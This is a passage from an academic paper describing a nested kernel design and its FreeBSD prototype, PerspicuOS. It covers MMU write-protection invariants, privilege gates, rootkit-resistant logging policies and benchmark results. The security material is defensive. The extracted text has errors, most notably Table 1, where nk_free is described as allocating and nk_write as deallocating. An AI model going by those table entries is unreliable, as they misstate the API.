arbitrary OS data structures. Negligible performance impact. The nested kernel architecture provides isolation and privilege separation without requiring separate address spaces so that it can be applied to operating system architectures with minimal overhead. In our x86-64 prototype, we also run both the outer kernel and nested kernel in the same protection ring (ring 0) rather than via hardware virtualization extensions to avoid costly hypercalls, as evidenced by measurements in Section 5.3. 2.3 Virtualizing the MMU via API Emulation We summarize the runtime isolation of the pMMU as the following property, which Invariants 1 and 2 enforce: **Nested Kernel Property.** The nested kernel interposes on all modifications of the pMMU via the vMMU. **Invariant 1.** Active virtual-to-physical mappings for protected data are configured read-only while the outer kernel executes. **Invariant 2.** Write-protection permissions in active virtual-to-physical mappings are enforced while the outer kernel executes. Active virtual-to-physical mappings are those mappings that may be used by the processor to determine page protections; inactive mappings do not affect memory access privileges. Invariant [2] applies to those processors (such as the x86 [2]) which can disable page protections while still performing virtual-to-physical address translation. While these definitions are independent of whether the MMU uses hardware- or software-managed TLBs, we will assume a hardware-managed TLB to simplify discussion. On a hardware-TLB system, the nested kernel architecture enforces Invariant [1] by 1) requiring explicit initialization of PTPs, 2) creating an explicit interface to update the page-table entries (PTEs), and 3) configuring all PTEs that map PTPs as read-only. Therefore, any PTP that has not been explicitly initialized at boot time by the nested kernel or declared by the outer kernel via the vMMU is rejected from use, enforcing Invariant [1]. Invariant [2] can be enforced by a variety of mechanisms, including internal page protection mechanisms such as used in our prototype or external mechanisms such as a virtual machine monitor running at a higher hardware privilege level. Section 3.2 details how we ensure Invariant [2] is enforced in PerspicuOS on the x86-64 architecture. 2.4 Intra-Kernel Memory Write Protection Services By isolating the pMMU from the outer kernel, the nested kernel can fully enforce memory access control policies on any physical page in the system. For example, the nested kernel can write-protect all statically defined constant data or a subset of system call function pointers that never change at runtime. Therefore, the nested kernel architecture provides a simple, robust API for specifying and enforcing such policies on kernel memory. The write-protection services API, listed in Table 1, comprises memory allocation and a data write function with an accompanying byte-granularity mediation policy. Clients use the intra-kernel protection services to allocate regions of memory that are protected by and only written from nested kernel code. When an allocation is requested, either statically via \texttt{nk\_declare} or dynamically via \texttt{nk\_alloc}, the nested kernel initializes a write descriptor and allocates an associated memory region. The nested kernel also establishes the memory bounds for the region and sets the mediation callback function (as defined below) that implements the write-protection policy. The nested kernel returns to the client both the write descriptor and virtual address of the newly allocated write-protected region, and finally, write-protects all existing mappings to the physical pages containing the memory region. Clients specify write-protection policies in the form of mediation functions. Mediation functions enforce the update policies for write-protected kernel objects, and are invoked by the nested kernel prior to any writes. One example of a simple mediation function is a no-write policy for constant data, with function body, \texttt{return false;} , which rejects all writes to the memory region. A more complex example is a write-once policy, such as described in Section 4.1.1 where the nested kernel initializes a bitmap for each byte in the allocated memory region, then upon an \texttt{nk\_write}, validates that the write is only made to memory not previously written. A significant value of the write-protection interface is that even in the absence of a mediation function (e.g., all writes to the object are permitted), the updates must use \texttt{nk\_write}, thus thwarting overwrites from memory corruption bugs. Once a write descriptor, \texttt{nk\_wd}, is created, the outer kernel executes mediated writes via the \texttt{nk\_write} function. \texttt{nk\_write} operates similarly to a simple byte-level memory copy operation. \texttt{nk\_write} performs two checks prior to executing the write: 1) it verifies that the write is within the boundary of the region specified by \texttt{nk\_wd}, and 2) it invokes the mediation function, if any. By allowing clients to write only a subset of the memory region, the nested kernel allows protection of aggregate data types without requiring any knowledge about its fields. The interface also makes bounds checking fast by including the write descriptor for constant-time lookup of the descriptor information for the given region. To fully support dynamically allocated memory, the nested kernel provides \texttt{nk\_free}, which deallocates memory previously allocated by \texttt{nk\_alloc}. Because an OS exploit could prematurely force \texttt{nk\_free} to be called on a memory region and then attempt to store to it, any freed memory must be retained in protected memory, and so we design a simple interface that assumes the allocator is part of the nested kernel. 2.5 Preventing DMA Memory Writes The nested kernel must also prevent DMA writes to protected memory. We require that the system have an IOMMU [1] that the nested kernel can use to ensure that DMA operations do not modify any pages protected by the nested kernel. 3. PerspicuOS: A Nested Kernel Prototype We present a concrete implementation of the nested kernel architecture, named PerspicuOS, for x86-64 processors. PerspicuOS introduces a novel method for ensuring privilege separation between the outer kernel and the nested kernel while running both at the highest hardware privilege level, effectively creating two virtual privilege levels in ring 0. PerspicuOS achieves this goal by taking advantage of x86-64 hardware support for efficiently enabling and disabling MMU write protection enforcement and by controlling which privileged instructions can be used by outer kernel code. More specifically, PerspicuOS applies the design presented in Section 2.5 by configuring all mappings to PTPs as read-only and de-privileging the outer kernel so that it cannot disable write-protection enforcement at ring 0. PerspicuOS de-privileges the outer kernel by scanning all outer kernel code to ensure that it does not contain instructions that disable the WP-bit or the MMU. Additional hardware features (described in Section 3.5) prevent user-space code or kernel data from being used to disable protections. In this section, we describe our threat model, specify a set of invariants to maintain the Nested Kernel Property, and then discuss how PerspicuOS maintains the invariants through a combination of virtual privilege switch management, MMU configuration validation, and lifetime kernel code integrity. 3.1 Threat Model and Assumptions In this work, we assume that the outer kernel may be under complete control of the attacker who can attempt to arbitrarily modify CPU state. Furthermore, we assume that an attacker can modify outer kernel source code, i.e., that outer kernel code may be malicious. Moreover, we do not assume or require outer kernel control flow integrity, which means that an attacker can arbitrarily target any memory location on the system for execution. For example, since nested kernel and outer kernel code may reside in a unified address space, an attacker could attempt to redirect execution to arbitrary locations within nested kernel code, including instructions that toggle write-protections (i.e., the nested kernel must take explicit steps to prevent such control transfers or render them harmless). We assume that the nested kernel source code and binaries are trusted and that the nested kernel is loaded with a secure boot mechanism such as in AEGIS [45] or UEFI [48]. We also trust mediation functions, a necessary requirement to ensure security checks execute in PerspicuOS. We assume that the nested kernel and mediation functions are free of vulnerabilities, and given the small source code size (less than 5,000 lines-of-code), the nested kernel could be formally or manually verified. Furthermore, we assume that the hardware is free of vulnerabilities and do not protect against hardware attacks. 3.2 Protection Properties and Invariants The nested kernel design specifies two invariants that must hold to enforce the Nested Kernel Property. Invariant 1 requires that all active mappings to PTPs be configured as read-only; Invariant 2 requires that these configurations be enforced while the outer kernel is in operation. We systematically assessed the x86-64 architecture specification [2] to identify both the necessary hardware configurations to realize invariants 1 and 2 and the hardware configurations that may violate those invariants. For example, write-protections are enforced on supervisor-mode accesses when both the WP-bit is set and the mapping is configured as read-only; however, alternative execution modes, such as System Management Mode (SMM), can bypass write-protections when invoked. From this assessment, we derive the following invariants that ensure that invariants 1 and 2 hold. 3.2.1 Supporting Invariant 1 The set of active mappings in x86-64 is controlled by the CR3 register and a set of in-memory PTPs [2]. CR3 specifies the base address of a “top-level” page serving as the root for a hierarchical translation data structure that is traversed by the MMU [2]. To ensure that all translations to protected physical pages are marked as read-only (thereby asserting 1), PerspicuOS enforces the following invariants: Invariant 3. Ensure that there are no unvalidated mappings prior to outer kernel execution. Invariant 4. Only declared PTPs are used in mappings. Invariant 5. All mappings to PTPs are marked read-only. Invariant 6. CR3 is only loaded with a pre-declared top-level PTP. <table> <thead> <tr> <th>Function</th> <th>Selected Arguments</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>nkDeclare</td> <td>mem_start, size, mediation_func</td> <td>Marks all pages RO; initializes an NK write descriptor nk_wd; returns the nk_wd and the pointer to the region.</td> </tr> <tr> <td>nk_alloc</td> <td>size, mediation_func, nk_wd_p</td> <td>Allocates memory region; invokes nk_start on it; stores write descriptor in nk_wd; returns nk_wd and pointer to the region.</td> </tr> <tr> <td>nk_free</td> <td>nk_wd</td> <td>Allocates memory region identified by nk_wd. Memory must have been allocated by nk_alloc. Freed pages can be reused only by a future nk_alloc.</td> </tr> <tr> <td>nk_write</td> <td>dest, src, size, nk_wd</td> <td>Deallocates memory identified by nk_wd. Memory must have been allocated by nk_alloc. Freed pages can be reused only by a future nk_alloc.</td> </tr> </tbody> </table> Table 1. Nested Kernel Write Protection API. nkDeclare is for static allocation and nk_alloc is for dynamic allocation. 3.2.2 Supporting Invariant [2] PerspicuOS must ensure that, while the outer kernel is operating, MMU write-protactions are continually enforced. Read-only permissions are enforced by x86-64 when the processor is operating in long mode with write-protactions enabled, i.e., Protected Mode Enable (PE-bit), Paging Enabled (PG-bit), and Write-Protect Enable (WP-bit) bits are set in CR0; Physical Address Extensions (PAE-bit) bit is set in CR4; and Long Mode Enable (LME-bit) bit is set in the EFER model specific register (MSR) [2]. Therefore, PerspicuOS considers scenarios where the outer kernel attempts to 1) disable the WP-bit while in operation, 2) disable paging by modifying the PG-bit, or 3) subvert control flow of the nested kernel so that the outer kernel gains control of execution while the WP-bit has been legitimately disabled for nested kernel operations. PerspicuOS ensures that the WP-bit is always set while the outer kernel is in operation and that any instantaneous mode changes that could disable paging, such as an SMM interrupt, are directed to nested kernel control. Invariants 7 and 8 capture the requirements of the WP-bit. Invariant 7. The WP and PG flags in CR0 are set prior to any outer kernel execution. Invariant 8. The WP-bit in CR0 is never disabled by outer kernel code. When the PG-bit is disabled, the processor immediately interprets virtual addresses as physical addresses [2]. As Section 3.7 describes, preventing the outer kernel from clearing the PG-bit is impossible. Instead, PerspicuOS enforces the following invariant: Invariant 9. Disabling the PG-bit directs control flow to the nested kernel. Additionally, SMM may be invoked by the outer kernel and therefore, PerspicuOS must also assert control on the SMI interrupt. Invariant 10. The nested kernel controls the SMM interrupt handler and operation. Given that the previous set of invariants hold, the outer kernel might attempt to manipulate CPU state or outer kernel memory in such a way as to cause control-flow to move from nested kernel code to outer kernel code without re-enabling the WP-bit. Therefore, to ensure write-protactions are always enforced, PerspicuOS must protect against control-flow attacks on nested kernel execution in two specific cases: interrupt control flow paths and nested kernel stack state manipulation. PerspicuOS ensures that all exit paths from the nested kernel to the outer kernel enable the WP-bit (shown in Figure 3), which is captured in the following invariant: Invariant 11. Enable the WP-bit on interrupts and traps prior to calling outer kernel interrupt/trap handlers. Because the trap handlers are a part of the nested kernel, the Interrupt Descriptor Table (IDT) [2] must be placed in protected memory and modifications of the Interrupt Descriptor Table Register (IDTR) must be solely a nested kernel operation. Invariant 12. The IDT must be write-protected, and the IDTR is only updated by the nested kernel. On a multiprocessor system, code running in outer kernel context on one core could modify the return address stored on the stack by code running in nested kernel on another core if the stack is in outer kernel memory. This would cause nested kernel code to return to outer kernel context without enabling the WP-bit. Therefore, PerspicuOS must ensure that code running in the nested kernel uses its own stack located in nested kernel memory. Invariant 13. The nested kernel stack is write-protected from outer kernel modifications. 3.3 System Initialization PerspicuOS must ensure that all mappings to protected pages (e.g. PTPs, code, nested kernel data, etc.) are configured as read-only and that paging is enabled prior to outer kernel execution, as suggested by invariants 2 and 7. Therefore, PerspicuOS, as depicted in Figure 1, initializes the paging system so that invariants 5—where validation implies invariants 4, 5 and 6 by registering all protected pages in nested kernel data structures—and 7 are enforced prior to outer kernel execution by using secure boot and “nested kernel init” functionality, thereby initializing all PTEs in the system. 3.4 Virtual MMU Interface PerspicuOS provides a set of functions, called the nested kernel operations, that allow the outer kernel to configure the pMMU. The nested kernel operations interpose on underlying x86-64 instructions, called protected instructions, to isolate the pMMU. There are two classes of nested kernel operations: those that control the configuration of the hardware PTPs via memory writes and those that control updates to processor control registers. The nested kernel enforces pMMU update policies by assigning types to physical pages based upon the kind of data stored in each physical page. The page types include PTPs, nested kernel code and data, outer kernel code and data, user code and data, and data protected by the intra-kernel write-protection service. This type information, along with the number of active mappings and a list of all virtual address mappings to the page, is kept in a physical page descriptor. The outer kernel uses the nk_declare_PTP operation to specify the physical pages to be used as PTPs. The nk_declare_PTP operation takes, as arguments, the level within the page table hierarchy at which the physical page will be used and the address of the physical page being declared, then zeros each page to eliminate any stale data, write-protects all existing virtual mappings to the physical page, and registers the physical page as a PTP by updating the page’s physical page descriptor. Once declared, a physical page cannot be modified directly by outer kernel code. Instead, the outer kernel uses the nk_write_PTE operation, which inspects and validates all mappings prior to insertion. The nested kernel uses the previously described physical page type information along with a list of existing mappings to each page to ensure that 1) if the PTE does not point to a data page then it targets a declared PTP and 2) all mappings to PTPs are write-protected, thereby ensuring invariants 4 and 5 respectively. The nested kernel also protects nested kernel code, data, and stack pages to avoid code modifications that would eliminate mediation or functionality of the pMMU update process. We also ensure that the update does not write to any kernel data protected by the nested kernel; this is done via a simple check that ensures that the physical page being updated was previously declared as a page table page. The second group of operations configure the paging hardware itself. We expose an interface for updating CR3 to ensure that it only points to a declared top-level PTP, called PML4-PTP, thereby ensuring invariant 6. The interface for modifying other registers ensures that paging and lifetime kernel code integrity protections are not disabled by outer kernel code. The description of these mechanisms are in Sections 3.5 and 3.7. 3.5 Lifetime Kernel Code Integrity To prevent protected instructions from being executed while in outer kernel context, PerspicuOS first validates all code before making it executable in supervisor-mode, and second, protects the runtime integrity of validated code by enforcing lifetime kernel code integrity, thereby maintaining invariants 6 and 8. PerspicuOS enforces load time outer kernel code validity by scanning binary code to ensure that it does not contain any protected instructions, including at unaligned instruction boundaries. Then PerspicuOS enforces dynamic lifetime outer kernel code integrity by configuring the processor and pMMU so that 1) by default all kernel pages are mapped as non-executable (enforced by the no- ### Table 2. Nested Kernel Operations, Protected Instructions, Description, and Constraints <table> <thead> <tr> <th>Operation</th> <th>x86 Instruction</th> <th>Description</th> <th>Constraints</th> </tr> </thead> <tbody> <tr> <td>nk_declare_PTP</td> <td>None</td> <td>Initialize physical page descriptor as usable in page tables</td> <td></td> </tr> <tr> <td>nk_write_PTE</td> <td>mov VAL, PTEADDR</td> <td>Update pMMU mapping</td> <td></td> </tr> <tr> <td>nk_remove_PTP</td> <td>mov VAL, PTEADDR</td> <td>Remove physical page from being used as PTP</td> <td></td> </tr> <tr> <td>nk_load_CR0</td> <td>mov %REG, %CR0</td> <td>Controls enforcement of read-only mappings</td> <td></td> </tr> <tr> <td>nk_load_CR3</td> <td>mov %REG, %CR3</td> <td>Controls MMU mapping base PML4 page</td> <td></td> </tr> <tr> <td>nk_load_CR4</td> <td>mov %REG, %CR4</td> <td>Controls user mode execution with SMEP flag</td> <td></td> </tr> <tr> <td>nk_load_MSR</td> <td>wrmsr Value, MSR</td> <td>Control enforcement of no-execute permissions</td> <td></td> </tr> </tbody> </table> ![Figure 2. Nested Kernel Entry.](image2) ![Figure 3. Nested Kernel Exit.](image3) 3.6 Virtual Privilege Switches In PerspicuOS, the nested kernel and outer kernel share a single address space. Therefore, nested kernel operations are essentially function calls to nested kernel functions that are wrapped by entry and exit gates that (among other things) disable and enable the WP-bit. Virtual privilege switches occur when write-protection is disabled (which only occurs... on nested kernel operations). In this section, we detail PerspicuOS entry and exit gates and describe the ways in which PerspicuOS ensures that the outer kernel does not gain control while write protections are disabled (enforcing I11 and I13) and how the gates ensure that mediation functions execute (ensuring I4 and I5). 3.6.1 Nested Kernel Entry and Exit Gates The nested kernel entry and exit gates ensure that there is a clear and protected privilege boundary between the nested kernel and the outer kernel. The routines depicted in Figures 2 and 3 perform the virtual privilege switch. The entry gate (Figure 2) disables interrupts, turns off system-wide write protections, disables interrupts, and then switches to a secure nested kernel stack; the exit gate (Figure 3) executes the reverse sequence. PerspicuOS by default disables interrupts while in operation; however, we include the second interrupt disable instruction to avoid instances where the outer kernel invokes interrupts that may corrupt internal nested kernel state. 3.6.2 Interrupts PerspicuOS disables interrupts when executing in the nested kernel. Because the nested kernel is limited to a very small set of functionality, disabling interrupts is not expected to impact performance. Disabling interrupts simplifies the design of nested kernel operations because they can execute atomically: they do not need to contend with the possibility of being interrupted. However, long-running mediation functions may need to run with interrupts enabled—we leave supporting this feature as future work. PerspicuOS must also ensure that the WP-bit is set whenever either a trap occurs or if the outer kernel directly invokes the WP-bit disable instruction and subsequently manages to execute an interrupt prior to the second interrupt disable instruction. This is necessary because an attacker could feed inputs to a mediated function that causes it to generate a trap; if the handler runs in the outer kernel, it would be running with write-protection disabled. PerspicuOS protects against these attacks by isolating the x86-64 interrupt handler table, enforcing invariant I12 and configuring it to send all interrupts and traps through the nested kernel trap gate first—depicted in Figure 1—the nested kernel trap gate sets the WP-bit before transferring control to an outer kernel trap handler, following a similar loop as the exit gate starting at assembly label “l” in Figure 3, thus enforcing invariant I11. 3.6.3 Nested Kernel Stack To enforce invariant I13, PerspicuOS includes separate stacks for the nested kernel. Upon entry to the nested kernel, PerspicuOS saves the existing outer kernel stack pointer and switches to a preallocated nested kernel stack, as shown in Figure 2. When exiting the nested kernel, PerspicuOS restores the original outer kernel stack pointer (Figure 3). 3.6.4 Ensuring Write Mediation By mapping the nested kernel code into the same address space as the outer kernel, PerspicuOS gains in efficiency on privilege switches; however, the outer kernel can directly jump to instructions that modify the protected state. For example, the outer kernel can target the instruction that writes to PTP entries, thus, bypassing the vMMU mediation. However, such a write will fail with a protection trap because the jump would have bypassed the entry gate, which is the only way to turn off the system-wide write protections enforced by the WP-bit (Figure 2). In this way, PerspicuOS ensures that either mediation will occur or the system will detect a write violation. 3.7 Privileged Register Integrity While the protections in Section 3.5 prevent the outer kernel from directly modifying privileged registers (e.g., CR0, CR3, IDTR), it is possible for the outer kernel to jump to instructions within the nested kernel that configure these registers. To protect against this, the nested kernel unmaps pages containing these instructions from the virtual address space when the outer kernel is executing and maps them only when needed. Invariants 6 protecting CR3, and 12 protecting IDTR, are enforced using this method because direct modification of these registers can allow the outer kernel to instantly gain control. While this works for most privileged registers, it does not work for CR0 to enforce 6 because the entry and exit gates must toggle write protections, and therefore the instruction to disable CR0 must be mapped into the same address space as the outer kernel. Therefore, the outer kernel could load a value into the RAX register and jump to the instruction in the entry and exit gates that move RAX into CR0. Ideally, the entry and exit gates would use bit-wise OR and AND instructions with immediate operands to set and clear the WP-bit in CR0. Unfortunately, the x86-64 lacks such instructions; it can only copy a value in a general purpose register into a control register. Note that the protected instruction “mov %REG, %CR0” is only mapped at three code locations, the entry, exit, and trap gates. Entry gates do not require verification of the value loaded to CR0 because the purpose of the entry gate is to disable the WP-bit; in contrast, exit and trap gates return control flow to the outer kernel after modifying CR0. The exit and trap gates must therefore ensure that the WP-bit is enabled. To do so, PerspicuOS inserts a simple check and loop in the exit gate to ensure that the value of RAX has the WP-bit enabled, thus ensuring invariant 8. Since these are the only instances of writes to CR0 in the code, PerspicuOS ensures that outer kernel attacks cannot bypass write-protections by using these instructions. In the x86-64 architecture, paging is enabled when the processor is in either protected mode with paging enabled (both PG-bit and PE-bit set) or long mode (PG, PE, PAE, and the LME bits set). To handle the situation where the outer kernel disables the PG-bit (regardless of whether the CPU is in long or protected mode), PerspicuOS configures the MMU so that the virtual address of the entry gate matches a physical address containing code that traps into the nested kernel. Therefore, enforcing invariant 9 whenever the PG-bit is disabled. If either the PAE-bit or LME-bit are disabled while the CPU is in long mode a general protection fault occurs. Because the bits are not updated but instead a trap occurs, the write-protections continue to be enabled and do not require any other solution. According to the Intel Architecture Reference Manual, the PE-bit cannot be disabled unless the PG-bit is also disabled \cite{51}, which is handled by the previously described solution. ### 3.8 Allocating Protected Data Structures PerspicuOS presents the intra-kernel write-protection interface as described in Section 2.3 for allocating and updating write protected data structures. PerspicuOS establishes a predefined ELF memory region to protect global statically-defined data structures. Kernel developers declare write-protected data structures with a C macro that uses a special compiler directive to notify the linker to allocate the object into the specified region. The macro then registers the object into the write descriptor table along with the precomputed bounds and generates both the nkd_wd and pointer to the region. PerspicuOS provides for dynamic allocation via the interface as described in Section 2.4. The shadow process list example uses this interface, which is described in Section 4.1.3. One of the primary challenges of implementing the nested kernel write protection services is to devise a method for conquering the protection granularity gap \cite{51}, specifically the issue of protecting data co-located on pages with non-protected data. The nested kernel interface can fully support in-place protections but would result in poor performance: each unprotected object would require a trap and emulate cycle. Therefore, we modify the linker script to put this protected ELF region onto its own set of separate pages so that only write-protected data is placed in the region. At boot time, pages belonging to this protected ELF section are write-protected via MMU configuration to ensure the Nested Kernel Property for each of these data structures. ### 3.9 Mediation Functions In an ideal nested kernel implementation, mediation functions would not be in the TCB. This would keep the TCB small regardless of the number of policies and would allow policies to be mutually distrusting. However, to simplify implementation, and to ensure that the mediation functions are executed prior to writes, mediation functions are incorporated into PerspicuOS’s TCB. In our evaluation of the write protection interface, we present a set of predefined trusted mediation functions (which, like the mediation functions in an ideal design, do not write to nested kernel memory). ### 3.10 Implementation We implemented PerspicuOS in FreeBSD 9.0. We replaced all instances of writes to PTPs to use the appropriate nested kernel API function and inserted validation checks as Section 3.4 describes. We modified the trap handlers to check for and enable the WP-bit; however, we did not implement the IDT and IDTR protections. We believe that these will not impact performance as modern OS kernels rarely modify the IDT and IDTR. We ported and implemented nested kernel calls for each function in Table 2. These calls perform the requested operation and verify that the value in the register is correct. We ported all instances of writes to MSRs to ensure the NX bit is always set in EFER; however, we did not fully implement no-execute page permissions in the PTPs. We do not believe these will negatively impact performance as the nested kernel already interposes on all MMU updates and sets other protection bits accordingly. We also implemented an offline scanner for the kernel binary; we have applied this to the entire core kernel but not to dynamically loaded kernel modules (this is a minor matter of engineering). Our current implementation uses coarse-grained synchronization even though our evaluation is on a uni-processor. It uses a single nested kernel stack with a lock to protect it from concurrent access. We did not implement protections for DMA writes or enforce nested kernel control on SMI events; however, we do not believe they will negatively impact performance because these are rare events under normal operation. Last, we did not fully implement all features to enforce Invariant 6; however, we did implement code that updates a PTE and flushes the TLB to simulate mapping and unmapping the code that modifies CR3. We believe this faithfully represents the performance costs of the full solution. ### 4. Enforcing Intra-Kernel Security Policies The nested kernel architecture permits kernel developers to employ fundamental design principles such as least privilege and complete mediation \cite{31}. In this section, we explore several intra-kernel security policies enabled by the nested kernel. Our examples demonstrate the nested kernel’s ability to combat key mechanisms used by well-known classes of kernel malware such as rootkits \cite{27}. We emphasize that our use cases do not completely solve specific high-level security goals (such as preventing rootkits from evading detection). However, they demonstrate specific key elements for complete solutions. Developing complete solutions is part of our ongoing work. #### 4.1 Nested Kernel Write Mediation Policies The nested kernel provides kernel developers with the ability to prevent or monitor memory writes at run-time. We illustrate three write-protection policies that this interface can enforce; each can be used for multiple security goals. 4.1.1 Write-Once Data Several kernel data structures are written to only once, when they are initialized. Other structures are initialized to default values and are only changed once during operation (e.g., the system call table). Our interface can protect these data with very low overhead. As such, PerspicuOS implements a simple, byte-granularity, write-once policy within the nested kernel. It is enforced by maintaining a bit-vector with one bit per byte, initialized to zeroes. When \texttt{nk\_write} is called, it uses a mediation function that checks whether each bit is set for the memory to be modified; if all the bits are clear, it writes the data and marks those corresponding bits as being written. We apply the write-once policy to protect the FreeBSD system call table by allocating the table within nested kernel-protected pages and selecting the write-once policy, guaranteeing that it can never be overwritten by malware after initialization. This application defends against kernel malware that “hook” system call dispatch by overwriting entries in the system call table to invoke exploit code [27], and could be extended to protect other key kernel code pointers. 4.1.2 Append-Only Data Operating systems also have append-only data structures such as circular buffers and event logs. These data structures reside in ordinary kernel memory and are vulnerable to kernel exploits, making them unreliable for forensics use. To protect such data structures, PerspicuOS implements an append-only write policy within the nested kernel. It is enforced by maintaining a “tail” pointer to a list structure within the nested kernel. Each call to \texttt{nk\_write} increments the tail pointer to ensure that writes never overwrite existing data within the region. A stricter policy could ensure that no gaps exist between successive writes. A full solution must also be able to securely write the log to disk when full, which our prototype does not yet do. We used this policy to implement a system call event logger that records system call entry and exit events in a statically allocated, append-only buffer. System call recording has been a popular target in both research systems [22, 23, 32, 36] and security monitoring applications [19, 21, 26, 33, 35, 44, 52]. However, these systems are susceptible to attack [49]. By protecting the log buffer, we ensure that rootkits cannot hide traces of malicious system call events and strengthen security staffs’ ability to conduct forensics investigations after breakins. Further effort is required to write the logs out to another media for long term storage, and to defend against an attacker that spoofs security events. 4.1.3 Write Logging A rootkit’s primary goal is to hide itself and malicious processes and files. Therefore, they often modify kernel data such as network counters, process lists, and system event logs [27]. Some of these data are challenging to protect due to being co-located within large kernel data structures; others cannot be protected by simple write-once and append-only policies. However, the ability to reliably monitor writes to such data enables detection of all malicious modifications. Therefore, we implement a general write-logging mechanism that records (and can later reconstruct) all writes to selected data structures. All calls to \texttt{nk\_write} for a memory region declared with this policy record the range of addresses modified and the values written into the memory. Again, this buffer must be periodically written to disk. As an example use case of the interface, we use write-logging to detect rootkits that attempt to hide processes by corrupting FreeBSD’s process list data structure: \texttt{allproc}. Instead of logging writes to \texttt{allproc} directly, we created a shadow \texttt{allproc} data structure that exactly mirrors the original list. Each shadow list entry contains a pointer back to the corresponding \texttt{allproc} entry, and any updates to the \texttt{allproc} list structure (e.g., unlinking a node) are also performed on the shadow list. More importantly, to fully hide the presence of a particular process from the kernel, the rootkit must use \texttt{nk\_write} to remove the shadow entry from the shadow list (which is logged). The logging of shadow list writes enables effective forensics. Security monitors can easily reconstruct the list updates and identify the prior existence of hidden processes. Moreover, we modified the \texttt{ps} program to query the shadow list instead of the \texttt{allproc} list so that the \texttt{ps} program can detect the presence of hidden processes. 4.2 System Protection Policies The nested kernel architecture can also realize several system security properties because it controls all virtual memory mappings in the system. One example is lifetime kernel code integrity (as Section 3.5 explains). This single use case effectively thwarts an entire class of kernel malware (namely code injection attacks). In addition to code integrity, PerspicuOS also marks memory pages as non-executable by default and enables superuser mode execution prevention of user-mode code and data. Even if commodity kernels use these hardware features, they cannot prevent malware from disabling them. PerspicuOS, in contrast, enables these protections and prevents malicious code from disabling them. PerspicuOS can also be used for any type of security monitor that inserts explicit calls into source code to ensure that the monitor both executes and is isolated from the untrusted code. 5. Evaluation We evaluate PerspicuOS by investigating the impact on the TCB, FreeBSD porting effort, de-privileging scanner, and performance overheads. We evaluated the overheads of PerspicuOS on a Dell Precision T1650 workstation with an Intel® Core™ i7-3770 processor at 3.4 GHz with 8 MB of cache, 16 GB of RAM, and an integrated PCIe Gigabit Ethernet card. Experiments requiring a network used a dedicated Gigabit ethernet network; the client machine on the network was an Acer Aspire Revo R3700 with an Intel® Atom™ D525 processor at 1.8 GHz with 2 GB of RAM. We evaluate five systems for each of our tests: the original (unmodified) FreeBSD system, the base PerspicuOS, and each of our three use cases: append-only, which is for system call entry and exit recording; write-once, used for the system call table protection; and write-log, used for the shadow process list. The baseline for the syscall use case was the original FreeBSD modified so that it is logging system call entry and exit events. 5.1 Trusted Computing Base and Kernel Porting The nested kernel requires porting existing functionality in a commodity kernel to use the nested kernel operations. Our port of FreeBSD to the nested kernel architecture modified 52 files totaling ∼1900 LOC changed, including comments. The vast majority of deleted lines were to configuration or build system files—ignoring these, only ∼100 LOC were eliminated in the port. Code modifications were measured using Git change logs. We measure the number of lines in the nested kernel with the SLOCCount tool [53]: the implementation consists of ∼4000 C SLOC and ∼800 assembly SLOC; the scanner was implemented in 248 python SLOC. 5.2 Code Scanning Results To evaluate the feasibility of eliminating all instances of protected instructions from the outer kernel, we scanned our compiled kernels and subsequently used manual methods to eliminate all unaligned protected instructions. We found a total of 40 implicit instructions for writing to CR0 (2) and wrmsr (38). Most of these instances are due to constants embedded in the code used for relative addressing; therefore, we eliminated them by adjusting alignments, rearranging functions, and inserting nops. A few were due to particular sequences of arithmetic expressions; these were addressed by replacing them with equivalent computation. Finally, a small number of constants in the outer kernel code contained implicit instructions. These were addressed by replacing the each constant with two others that were dynamically combined to create the equivalent value. 5.3 Privilege Boundary Microbenchmark To investigate the impact of different privilege crossings against the nested kernel architecture approach, we developed a simple microbenchmark that evaluates the round trip cost into a null function for each privilege boundary: syscall, nested kernel call, and VMM call (hypercall). For the syscall boundary experiment we used the syscall instruction to invoke a special system call added to the kernel that immediately returns. The VMM boundary cost experiment is performed using a guest kernel consisting solely of VMSCALL instructions in a loop executing within a VMM modified to resume the guest immediately after this instruction traps to the VMM. The nested kernel cost experiment uses an empty function wrapped with the entry and exit gates as described in Section 3.6.1. The microbenchmark performs each call one million times and reports total elapsed time. Each microbenchmark configuration was executed 5 times with negligible variance, and the computed average time per call is reported. Our results, shown in Table 3, indicate that a nested kernel call is approximately 3.69 times less expensive than a hypercall, thus motivating the performance benefits of implementing the nested kernel architecture at a single supervisor privilege level. User-mode to supervisor-mode calls are faster than nested kernel calls, which take approximately 1.59 times as long. 5.4 Micro-benchmarks To evaluate the effect that PerspicuOS has on system call performance, we ran experiments from the LMBench benchmark suite [50]. Figure 4 shows the results for our four systems relative to the original FreeBSD. In most cases, our systems are, at most, 1.25 times slower relative to the baseline (unmodified) FreeBSD kernel, mmap, fork+exit, and fork+exec, however, exhibit higher execution time overheads of approximately 2.5 to 3 times. This is because these benchmarks stress the eMMU with several consecutive calls to set up new address spaces. Upon investigation, we identified a small set of functions that were responsible for most of this behavior, and preliminary experiments showed a reduction by more than 60% when converting these to batch operations. In the future, we plan to extend the nested kernel interface to allow for batch updates to the vMMU in order to reduce overheads for these operations. We also observe that the write-once and write-log policies incur the same overheads as the base PerspicuOS system, whereas the append-only policy used for system call entry and exit recording incurs higher overheads. In fact, the worst relative overhead for this system is the null syscall benchmark; it occurs because each null system call makes two nested kernel operations calls. 5.5 Application Benchmarks To evaluate the overheads on real applications, we measured the performance of the FreeBSD OpenSSH server, the Apache httpd server running on the PerspicuOS kernel, and a kernel compile. We opted to use network servers as they exercise kernel functionality more heavily than many compute bound applications and are therefore more likely to be impacted by kernel overhead. **OpenSSH Server:** For the OpenSSH experiments, we transferred files ranging from 1 KB to 16 MB in size from the server to the client. We transferred each file 20 times, measuring the average bandwidth achieved each time. Figure 5 shows the average bandwidth overhead, relative to native, for each file size transferred. The maximum bandwidth reduction is 20% for 1 KB files. Transferring files above 64 KB in size has less than 2% reduction in bandwidth. **Apache:** For the Apache experiments, we used Apache’s benchmark tool ab to perform 10000 requests using 32 concurrent connections over a 1Gbps network for file sizes ranging from 1 KB to 1 GB. We performed this experiment 20 times for each file size, and present the results in Figure 6. The experiment results reveal negligible, if any, overheads that are within the standard deviation error. **Kernel Build:** The kernel build experiment cleaned and built a FreeBSD kernel from scratch for a total of 3 runs --- **Table 4.** Kernel Build Overhead over Native. <table> <thead> <tr> <th>PerspicuOS</th> <th>AppendOnly</th> <th>WriteOnce</th> <th>WriteLog</th> </tr> </thead> <tbody> <tr> <td>2.6%</td> <td>3.3%</td> <td>2.6%</td> <td>2.7%</td> </tr> </tbody> </table> 